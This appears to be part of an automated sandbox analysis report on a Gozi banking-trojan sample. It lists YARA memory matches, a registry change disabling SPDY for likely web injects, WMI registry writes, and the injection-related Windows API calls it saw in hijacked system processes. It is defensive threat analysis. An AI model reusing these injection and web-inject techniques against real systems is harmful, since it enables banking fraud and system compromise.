Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

8_2_010A7479

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_0304C124	2_2_0304C124
Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_0304E56A	2_2_0304E56A
Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_0304E570	2_2_0304E570
Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_07C27060	2_2_07C27060
Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_07C26030	2_2_07C26030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A7F60	8_2_010A7F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A6B67	8_2_010A6B67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A6DD3	8_2_010A6DD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F163BC	8_2_03F163BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1A241	8_2_03F1A241
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1F1EE	8_2_03F1F1EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F178F1	8_2_03F178F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0C086	8_2_03F0C086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0504A	8_2_03F0504A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1CF97	8_2_03F1CF97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F095FE	8_2_03F095FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F09D64	8_2_03F09D64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F034DC	8_2_03F034DC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E7AB44	28_2_00E7AB44
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E7B58C	28_2_00E7B58C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E686D0	28_2_00E686D0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E640E8	28_2_00E640E8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E568FC	28_2_00E568FC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E54080	28_2_00E54080
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E53890	28_2_00E53890
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E79858	28_2_00E79858
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E68024	28_2_00E68024
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E78820	28_2_00E78820
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E65828	28_2_00E65828
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E62804	28_2_00E62804
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6B008	28_2_00E6B008
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6A808	28_2_00E6A808
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E531D4	28_2_00E531D4
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E66190	28_2_00E66190
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6194B	28_2_00E6194B
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5B154	28_2_00E5B154
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E75954	28_2_00E75954
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E652CC	28_2_00E652CC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E512BC	28_2_00E512BC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E67BFC	28_2_00E67BFC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E53BA4	28_2_00E53BA4
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E72BA0	28_2_00E72BA0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E72330	28_2_00E72330
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5DCA8	28_2_00E5DCA8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6CCA8	28_2_00E6CCA8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E644B4	28_2_00E644B4
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5C49C	28_2_00E5C49C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6BC10	28_2_00E6BC10
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E59DF0	28_2_00E59DF0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E78DA0	28_2_00E78DA0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E7C588	28_2_00E7C588
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E77D6C	28_2_00E77D6C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E60544	28_2_00E60544
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E74530	28_2_00E74530
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6751C	28_2_00E6751C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5A6D0	28_2_00E5A6D0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E77EA0	28_2_00E77EA0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E73E2C	28_2_00E73E2C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E61618	28_2_00E61618
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E737D0	28_2_00E737D0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E78FA8	28_2_00E78FA8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E57F64	28_2_00E57F64
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5CF44	28_2_00E5CF44
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E69740	28_2_00E69740
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6FF4C	28_2_00E6FF4C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA986D0	36_2_0000020FDEA986D0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAAAB44	36_2_0000020FDEAAAB44
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8A6D0	36_2_0000020FDEA8A6D0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA812BC	36_2_0000020FDEA812BC
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA952CC	36_2_0000020FDEA952CC
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA7EA0	36_2_0000020FDEAA7EA0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA37D0	36_2_0000020FDEAA37D0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9BC10	36_2_0000020FDEA9BC10
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA95828	36_2_0000020FDEA95828
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA8820	36_2_0000020FDEAA8820
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA98024	36_2_0000020FDEA98024
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA97BFC	36_2_0000020FDEA97BFC
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9B008	36_2_0000020FDEA9B008
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9A808	36_2_0000020FDEA9A808
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA92804	36_2_0000020FDEA92804
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA87F64	36_2_0000020FDEA87F64
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA2330	36_2_0000020FDEAA2330
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9FF4C	36_2_0000020FDEA9FF4C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA99740	36_2_0000020FDEA99740
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8CF44	36_2_0000020FDEA8CF44
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA8FA8	36_2_0000020FDEAA8FA8
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA2BA0	36_2_0000020FDEAA2BA0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA83BA4	36_2_0000020FDEA83BA4
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA940E8	36_2_0000020FDEA940E8
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA944B4	36_2_0000020FDEA944B4
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9751C	36_2_0000020FDEA9751C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA868FC	36_2_0000020FDEA868FC
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA9858	36_2_0000020FDEAA9858
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8C49C	36_2_0000020FDEA8C49C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA83890	36_2_0000020FDEA83890
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8DCA8	36_2_0000020FDEA8DCA8
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9CCA8	36_2_0000020FDEA9CCA8
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA84080	36_2_0000020FDEA84080
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA831D4	36_2_0000020FDEA831D4
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA91618	36_2_0000020FDEA91618
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA3E2C	36_2_0000020FDEAA3E2C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA89DF0	36_2_0000020FDEA89DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8B154	36_2_0000020FDEA8B154
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA5954	36_2_0000020FDEAA5954
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA7D6C	36_2_0000020FDEAA7D6C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA4530	36_2_0000020FDEAA4530
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9194B	36_2_0000020FDEA9194B
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA90544	36_2_0000020FDEA90544
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA96190	36_2_0000020FDEA96190
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA8DA0	36_2_0000020FDEAA8DA0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAAC588	36_2_0000020FDEAAC588
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAAB58C	36_2_0000020FDEAAB58C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030463BC	47_2_030463BC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304A241	47_2_0304A241
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304F1EE	47_2_0304F1EE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303504A	47_2_0303504A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303C086	47_2_0303C086
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030478F1	47_2_030478F1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304CF97	47_2_0304CF97
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03039D64	47_2_03039D64
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030395FE	47_2_030395FE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03055430	47_2_03055430
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030334DC	47_2_030334DC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_03F0E6B9 CreateProcessAsUserA,

8_2_03F0E6B9

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040140F NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	8_2_0040140F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040182F GetProcAddress,NtCreateSection,memset,	8_2_0040182F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00401ABC NtMapViewOfSection,	8_2_00401ABC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A231E NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	8_2_010A231E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A5D85 GetProcAddress,NtCreateSection,memset,	8_2_010A5D85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A60A0 NtMapViewOfSection,	8_2_010A60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A8185 NtQueryVirtualMemory,	8_2_010A8185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1B38D memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,	8_2_03F1B38D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0D317 NtMapViewOfSection,	8_2_03F0D317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F21AE3 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	8_2_03F21AE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0D274 NtQueryInformationProcess,	8_2_03F0D274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F229E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	8_2_03F229E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0317C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	8_2_03F0317C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0696A GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	8_2_03F0696A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F12931 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	8_2_03F12931
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F076E3 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	8_2_03F076E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1CEED GetProcAddress,NtCreateSection,memset,	8_2_03F1CEED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F17523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	8_2_03F17523
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F08C10 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	8_2_03F08C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F10B30 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	8_2_03F10B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F10A74 NtReadVirtualMemory,	8_2_03F10A74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F2389B NtGetContextThread,RtlNtStatusToDosError,	8_2_03F2389B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0483A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	8_2_03F0483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F03F97 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	8_2_03F03F97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F17EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	8_2_03F17EEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F01641 memset,NtQueryInformationProcess,	8_2_03F01641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0155B NtQuerySystemInformation,RtlNtStatusToDosError,	8_2_03F0155B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1E4D5 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	8_2_03F1E4D5
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E69994 NtReadVirtualMemory,	28_2_00E69994
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E56140 NtAllocateVirtualMemory,	28_2_00E56140
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E51B84 NtQueryInformationProcess,	28_2_00E51B84
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose,	28_2_00E6AC44
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E73C1C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	28_2_00E73C1C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E7B58C NtSetContextThread,NtUnmapViewOfSection,NtClose,	28_2_00E7B58C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E70E70 NtMapViewOfSection,	28_2_00E70E70
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5E614 NtCreateSection,	28_2_00E5E614
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E51FBC NtWriteVirtualMemory,	28_2_00E51FBC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5FF60 RtlAllocateHeap,NtQueryInformationProcess,	28_2_00E5FF60
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E8F01F NtProtectVirtualMemory,NtProtectVirtualMemory,	28_2_00E8F01F
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA81B84 NtQueryInformationProcess,	36_2_0000020FDEA81B84
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose,	36_2_0000020FDEA9AC44
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEABF00B NtProtectVirtualMemory,NtProtectVirtualMemory,	36_2_0000020FDEABF00B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303D274 NtQueryInformationProcess,	47_2_0303D274
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03051AE3 memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	47_2_03051AE3
